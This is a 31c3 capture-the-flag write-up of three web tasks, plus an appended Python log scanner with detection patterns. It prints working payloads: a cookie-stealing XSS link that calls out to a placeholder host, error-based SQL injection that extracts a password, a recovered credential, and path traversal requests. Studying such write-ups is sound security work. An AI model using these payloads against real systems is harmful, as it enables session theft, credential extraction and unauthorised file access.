31 December 2014

31c3 CTF: WEB Tasks Quick Writeup

PHP is nasty crappy sometimes, just pwn it
http://188.40.18.69/


These guys have ripped off our designs and are using them in their web page builder, we'd Haxx them, don't worry we'll give you decent points for it
http://188.40.18.76/


It's some devilish community public portal, we're pretty sure there's something else out there, a private portal maybe, we'd like to know the secret behind it
http://188.40.18.70/

pCRAPp

http://188.40.18.69/pCRAPp.php?a={%22a1%22:[0],%22a2%22:[[0],0,0,0,0]}&b=01&c[]=&c[][]=&d=%0 031c3
Remove the space inside the null byte at the end of the URL (%0 0 should be %00).



Page Builder

XSS in the filename, which is reflected through a provoked PHP error.

http://188.40.18.76/output/04aa5e2122da4f9583ff294841f2163b4c4223a3/<img src=f onerror=eval(window.location.hash.substring(1))>.php#window.location=http://xx/?f=+document.cookie;
Send the link to the admin and you get the flag.


Devilish

PoC:
/PROFILE/56\/||(extractvalue(1,concat(0x7e,(select(1)from(users)limit%0D0,1))))--%0D-

GET COLUMNS:
/PROFILE/56%5C/%0D||%28extractvalue%281,concat%280x7e,%28select%281%29from%28%28SELECT*FROM%0Dusers%0DJOIN%0Dusers%0Db%0DUSING%28id_user,Us3rN4m3,Em4iL4dR3Szz,S4cR3dT3xT0Fm3,MyPh0N3NumB3RHAHA,Addr3Zz0F_tHi5_D3wD,CHAR_LOL%29%29a%29limit%0D0,1%29%29%29%29--%0D-

GET PASSWORD:
/PROFILE/56\/||(extractvalue(1,concat(0x7e,(select(P4sWW0rD_0F_M3_WTF)from(users)limit%0d0,1))))--%0d-
/PROFILE/56\/||(extractvalue(1,concat(0x7e,(select(reverse(P4sWW0rD_0F_M3_WTF))from(users)limit%0D0,1))))--%0D-

LOGIN:
KiTTyKiTTy:sd654egezjniufsdqc89q7d65azd123wxcbqyuslkdz65756sd


GET LOCAL WEBSITE:
http://188.40.18.70/ACCESS?action=browse&dir=../../../../../etc/apache2/sites-enabled
This reveals devilish.local.conf.

DEVILISH.LOCAL FILES:
http://188.40.18.70/ACCESS?action=browse&dir=../../../../../home/devilish.local


GET SOME SOURCES
http://188.40.18.70/__WebSiteFuckingPrivateContentNotForPublic666/LOGIN_HEAD
http://devilish.local/__WebSiteFuckingPrivateContentNotForPublic666+666/LOGIN_HEAD


LOGIN
user=KiTTyKiTTy&pass=sd654egezjniufsdqc89q7d65azd123wxcbqyuslkdz65756sd&is_ExclusiveMember=1

After that login, set the PHPSESSID cookie on devilish.local to the same value as on the public site.

Refresh http://devilish.local and get your flag.
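As an added defender-side example (not part of the original writeup), a small access-log scanner that URL-decodes request paths and flags the three request shapes used above: error-based SQL injection via extractvalue with %0D standing in for whitespace, ../ directory browsing through the ACCESS?dir= parameter, and a tag with an event handler in the path. The log lines and the PLACEHOLDERID are constructed.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not from the original writeup); the
# request paths copy the shapes of the payloads above, with a placeholder id.
SAMPLE_LOG = """
10.0.0.5 - - [31/Dec/2014:12:00:01 +0000] "GET /PROFILE/56 HTTP/1.1" 200 512
10.0.0.9 - - [31/Dec/2014:12:00:07 +0000] "GET /PROFILE/56%5C/%0D||%28extractvalue%281,concat%280x7e,%28select%281%29from%28users%29limit%0D0,1%29%29%29%29--%0D- HTTP/1.1" 500 1023
10.0.0.9 - - [31/Dec/2014:12:00:11 +0000] "GET /ACCESS?action=browse&dir=../../../../../etc/apache2/sites-enabled HTTP/1.1" 200 2048
10.0.0.9 - - [31/Dec/2014:12:00:20 +0000] "GET /output/PLACEHOLDERID/%3Cimg%20src=f%20onerror=alert(1)%3E.php HTTP/1.1" 404 300
"""

# Request-line extractor for combined-format access logs.
LOG_RE = re.compile(r'"(?:GET|POST) (?P<path>\S+) HTTP/')

RULES = {
    # MySQL XPath error leakage (extractvalue/updatexml, 0x7e marker), as in the PoC.
    "error_based_sqli": re.compile(
        r"\b(?:extractvalue|updatexml)\s*\(|concat\s*\(\s*0x7e", re.I),
    # Repeated ../ segments, as in the ACCESS?dir= browse requests.
    "path_traversal": re.compile(r"(?:\.\./){2,}|(?:\.\.\\){2,}"),
    # A tag carrying an on*= handler, or a script tag, in the request path.
    "xss": re.compile(r"<\s*\w+[^>]*\bon\w+\s*=|<\s*script\b", re.I),
}


def normalize(path: str) -> str:
    """URL-decode twice (catches double encoding) and fold CR/LF/TAB into
    spaces, so %0D-separated tokens look like the whitespace MySQL sees."""
    decoded = unquote(unquote(path))
    return re.sub(r"[\r\n\t]+", " ", decoded)


def classify(path: str) -> list[str]:
    """Return the names of all rules the normalized request path triggers."""
    text = normalize(path)
    return [name for name, rx in RULES.items() if rx.search(text)]


def scan_log(log_text: str) -> list[tuple[str, list[str]]]:
    """Return (raw_path, findings) for every log line that triggers a rule."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.search(line)
        if m:
            findings = classify(m.group("path"))
            if findings:
                hits.append((m.group("path"), findings))
    return hits


if __name__ == "__main__":
    for path, findings in scan_log(SAMPLE_LOG):
        print(f"{', '.join(findings):18} {path}")
```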
